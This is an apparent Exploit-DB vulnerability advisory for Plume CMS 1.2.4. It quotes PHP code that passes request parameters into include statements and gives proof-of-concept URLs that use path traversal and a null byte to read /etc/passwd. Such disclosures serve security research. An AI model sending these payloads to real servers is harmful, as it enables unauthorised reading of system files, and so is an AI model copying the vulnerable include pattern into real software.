Plume CMS 1.2.4 – Multiple Local File Inclusions

• Exploit Database
• 109 阅读

• 作者： eidelweiss
  日期： 2010-04-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12107/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  ######################################################## Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities ########################################################   [+]Title: Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities [+]Version: 1.2.4 (other or lower version may be also affected) [+]Download: http://sourceforge.net/projects/pxsystem/files/ [+]Author: eidelweiss [+]Contact: eidelweiss[at]cyberservices[dot]com   [!]Thank`s To: All Friends & All Hackers   ######################################################## Description: Plume CMS is a fully functional Content Management System in PHP on top of MySQL. Including articles, news, file management and all of the general functionalities of a CMS. It is completely accessible and very easy to use on a daily basis. ########################################################   -=[ Vuln C0de ]=-   [-] plume/manager/articles.php ********************** require_once &apos;path.php&apos;; require_once $_PX_config[&apos;manager_path&apos;].&apos;/prepend.php&apos;; require_once $_PX_config[&apos;manager_path&apos;].&apos;/inc/class.article.php&apos;; // <= line 26   ********************** [-] plume/manager/tools.php ********************** # On fait la liste des plugins $plugins_root = dirname(__FILE__).&apos;/tools/&apos;;   $objPlugins = new plugins($plugins_root); $plugins_list = $objPlugins->getPlugins();   $include = &apos;&apos;;   if (!empty($_REQUEST[&apos;p&apos;]) && !empty($plugins_list[$_REQUEST[&apos;p&apos;]]) && $plugins_list[$_REQUEST[&apos;p&apos;]][&apos;active&apos;]) { $px_submenu->addItem(__(&apos;Back to the tools&apos;), &apos;tools.php&apos;, &apos;themes/&apos;.$_px_theme.&apos;/images/ico_back.png&apos;, false); $p = $_REQUEST[&apos;p&apos;]; $_px_ptheme = $m->user->getPluginTheme($p); ob_start(); include $plugins_root.$p.&apos;/index.php&apos;; // <= line 54 $include = ob_get_contents(); ********************** [-] plume/manager/news.php   require_once &apos;path.php&apos;; require_once $_PX_config[&apos;manager_path&apos;].&apos;/prepend.php&apos;; require_once $_PX_config[&apos;manager_path&apos;].&apos;/inc/class.news.php&apos;;   **********************     -=[ Proof Of Concept ]=-   http://127.0.0.1/plume/manager/articles.php?_PX_config[manager_path]=../../../../../../etc/passwd%00   http://127.0.0.1/plume/manager/tools.php?p=../../../../../../etc/passwd%00   http://127.0.0.1/plume/manager/plume/manager/news.php?_PX_config[manager_path]=../../../../../../etc/passwd%00   etc , etc , etc.   ####################=[E0F]=####################